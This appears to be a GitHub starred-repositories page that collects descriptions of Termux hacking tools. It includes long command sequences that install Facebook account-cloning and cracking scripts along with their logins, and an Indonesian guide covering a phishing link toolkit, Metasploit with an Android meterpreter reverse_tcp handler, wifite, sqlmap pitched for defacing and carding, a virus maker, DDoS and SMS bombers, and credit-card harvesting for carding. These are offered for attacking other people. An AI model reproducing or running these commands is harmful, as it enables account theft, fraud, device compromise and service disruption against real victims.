M1ZZ001's starred repositories


Link-X is a Hack-Via-Link ToolKit. Including: Camera, Voice, Location Etc*4



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An advanced phishing tool for Termux and Linux, you can hide the phshing URL behind the REAL URL



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All Commands BlackMafia ⭕No 1 apt update apt upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/World cd World python2 Cloning.py User: Black pass: Mafia ⭕No 2 apt update apt upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/WorldCloning/ cd WorldCloning python2 World.py User Name : World Password : lovehacker ⭕No 3 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/Cobra cd Cobra python2 Scorpion.py User Name : Cobra Password: lovehacker ⭕No4 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/lov3Hak3r/ cd lov3Hak3r python2 lovehacker.py ⭕No 5 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/BlackMafia2020/ cd BlackMafia2020 python2 lovehacker User Name:Corona Password :lovehacker ⭕No 6 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/CoviD-19/ cd CoviD-19 python2 Virus.py User Name: Corona pasword: lovehacker ⭕No 7 pkg update pkg upgrade pkg install python2 pkg install git pip2 install mechanize pip2 install requests git clone https://github.com/lovehacker404/Dragon/ cd Dragon python2 lovehacker.py UserName: Dragon Password: lovehacker ⭕No8 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/KaliIndia/ cd KaliIndia python2 kalilinux.India.py User Name: India Password:lovehacker ⭕No9 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/Testing cd Testing python2 Project.py User Name: Testing pasword: lovehacker ⭕No10 git clone https://github.com/lovehacker404/Target.Atack/ cd Target.Atack ls cat README.md chmod +x Target.py ls nano password.txt ls pwd storage file location password.txt python2 Target.py ⭕No11 apt update apt upgrade pkg install python pkg install python2 pip2 install requests pip2 install mechanize pkg install git git clone https://github.com/lovehacker404/fblite cd fblite python2 Crack.py ⭕No12 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/india/ cd india python2 india.py User name. KashmirBanyGa pasword.Pakistan ⭕No 13 pkg install python2 pip2 install mechanize pip2 install requests pkg install git git clone https://github.com/lovehacker404/BlackMafiaNew1.12/ ls cd BlackMafiaNew1.12 python2 lovehacker user name. lovehacker password . 03094161457 ⭕No 14 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/RedMoonNew/ cd RedMoonNew python2 lovehacker User Name:: RedMoonNew Password:: lovehacker ⭕No15 apt update apt upgrade apt install git apt install python git clone https://github.com/lovehacker404/Install/ cd Install ls chmod +x * ls python all.py ⭕No16 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/NetHunting cd NetHunting python2 NetHunting.py User Name : linux Password : lovehacker ⭕No17 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/WorldCloning/ cd WorldCloning python2 World.py User Name : World Password : lovehacker ⭕No18 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/BangBang/ cd BangBang python2 Mafia User Name: Pakistan pasword: lovehacker ⭕No19 pkg update pkg upgrade pkg install python2 pip2 install mechanize pkg install git pip2 install mechanize pip2 install requests git clone https://github.com/lovehacker404/BlackMafiaError cd BlackMafiaError python2 Error.py ⭕No20 apt update apt upgrade -y pkg install python -y git clone https://github.com/lovehacker404/Black_Mafia cd Black_Mafia python3 Black_Mafia.py #Metasploit Commands 》》Requirements:- 1: Termux App (From Playstore) 2: Good Internet connection (Must) 3: 2GB free Storage (Must) 4: Android Version 5.0+ (Must) 5: 4GB+ RAM 6: Fast Processor #installation 1: pkg update 2: pkg upgrade 3: pkg install unstable-repo 4: pkg install metasploit 5: msfconsole 6: use exploit/multi/handler 7: set payload android/meterpreter/reverse_tcp 8: set lhost 8: set lport 8080 10: exploit



Cara Update dan Upgrade Termux pkg update && pkg upgrade Tools Pendukung untuk Termux Tools pendukung yang di perlukan agar tools yang lain work. <—-| PENTING pkg install git php curl -y pkg install python2 pkg install apache2 Trik Termux Untuk mematikan atau memberhentikan tools tekan tombol volume bawah (-) + C secara bersamaan Untuk memunculkan commands sebelumnya tekan tombol volume bawah + P Menampilkan Tombol ESC, HOME, CTRL dan lainnya Tekan Tombol volume atas + Q script termux Menampilkan Matrix  Ini cuma menampilkan angka dan huruf berjatuhan, terlihat keren •pkg install cmatrix cmatrix mempercantik termux Note : Jika ada pertanyaan saat install, silahkan ketik tombol y lalu enter saja, agar proses install dapat berjalan dengan lancar. Ratusan Tools Termux Sebagian dari Kali Linux •pkg install git •git clone https://github.com/Mrcakil/mrcakil •cd mrcakil •chmod +x tools •./tools ratusan tools termux Bermain atau Memunculkan Kereta Api pkg install sl sl main termux Bot Auto Reaction Facebook •git clone https://github.com/AMVengeance/FB-React.git •chmod +x FB-React -R cd FB-React •./start fb react Bot Love Instagram •git clone https://github.com/indogram/indotagram.git  •php indotagram/login.php  Masukkan username dan password instagram untuk memunculkan cookie Kemudian copy dan paste kode cookie ke website penyedia bot instagram disini bot instagram NIK dan KK Gratis •pkg install php git •git clone https://github.com/IndonesiaSecurity/kkktp •cd kkktp php •kkktp.php Menjalankan Musik di Termux pkg install mpv mpv /lokasi/musik/musik.mp3 cara memutar musik di termux Menampilkan Informasi System pkg install neofetch neofetch tampilan informasi Membuat Tulisan atau Teks Besar di Termux pkg install figlet figlet initulisannya cara membuat tulisan nesar di termux Crack hash password git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ cd FHX-Hash-Killer python2 FHXHashKiller.py Cara Menginstall Metasploit di Termux Metasploit adalah tools hacking yang dapat di gunakan untuk kegiatan seperti remote pc atau hp orang lain, membuat virus, menyadap dan lain sebagainya. Cara Install dan Menjalankannya pkg install curl curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh chmod +x metasploit.sh ./metasploit.sh Cara Install Wifite di Termux Android Wifite adalah salah satu tool yang berfungsi untuk wireless attack, seperti mengcrack atau membobol password wifi yang terkunci dengan wpa/wpa2, Cara Install Wifite git clone https://github.com/derv82/wifite cd wifite chmod 777 wifite.py Cara Menjalankan Wifite python2 wifite.py Bruteforce  Bruteforce ini metode hacking yang dimana kita akan membuat suatu wordlist yang berisi kumpulan tebakan password, jika ada salah satu password yang sesuai maka akun bisa di dapatkan. pkg install pip pip install wordlist pkg install worlist wordlist -h cd /sdcard cat pas.txt Redhawk Fitur Redhawk Server detection Cloudflare detector robots scanner Whois GEO-IP Scan NMAP Port Scan DNS Lookup SubNet Calculator Subdomain Finder Reverse IP Scanner CMS detection For Sites On the same server. Parameter Finder Error based SQLi Detector Dan lain – lain. Cara install dan menjalankan Redhawk git clone https://github.com/Tuhinshubhra/RED_HAWK cd RED_HAWK chmod +x rhawk.php php rhawk.php Install SQLMAP Tools ini berguna sekali untuk kegiatan mengetes keamanan website, deface, carding dan semacamnya gi clone https://github.com/sqlmapproject/sqlmap cd sqlmap python2 sqlmap.py Cara menjalankan python2 sqlmap.py -u website.com --dbs Mengetahui semua parameter Sqlmap python2 sqlmap.py -hh Melacak IP git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IPnya Hack Akun Facebook •pkg install python2-dev •apt install wget dip2 •install mechanize •cd/sterage/emulated/0 python2 fbbrute.py •storage/emulated/0/password.txt Membuat Virus git clone https://github.com/viruz09/CreaterVirus cd CreaterVirus python2 creater.py Cara copy virus cp agents.apk /lokasi/folder DDOS DDOS berguna untuk menyerang website dengan memberikan traffic yang tinggi sehingga website tersebut down. git clone https://github.com/4L13199/LITEDDOS python2 LITEDDOS.py [ip target atau domain] [port] [jumlah traffic] Cara Install Santet Online Di Termux  Fitur Create a Netcat Payload and Listener Facebook Group Hijack Attack SMS Bomber Attack Vectors SMS Spoof Attack Vectors Denial-of-Service Attack •git clone https://github.com/Gameye98/santet-online •cd santet-online •python2 santet.py Tools B4J1N94N Fitur Nyari CC buat carding Spam akun gmail Whois lookup Dan ratusan tools lainnya •git clone https://github.com/DarknessCyberTeam/B4J1N64Nv5 •cd B4J1N64Nv5 •sh B4J1N64N.sh



This is a automation of installing some important tools which all Linux & Termux users needs. Now only some tools are available. Try to get a target of 1000+ tools on this tool. If you want to help us to add some tools on this than please send tool name on my Telegram Group: http://t.me/linux_repo . This tool will do a automation installing of a tool. No need to do much things. It's collection of tools is better for now. Trying to make it best. I will update this tool soon. So must check updates on GitHub or Telegram Group: http://t.me/linux_repo . In next update I will add more tools. Also I will fix problems. If you want to report any issue than please do it in GitHub or Telegram Group: http://t.me/linux_repo . Trying to make this a best. So if you want to share any ideas to improve this tool or any feature should I put on this tool than please send your feedback on Telegram Group: http://t.me/linux_repo



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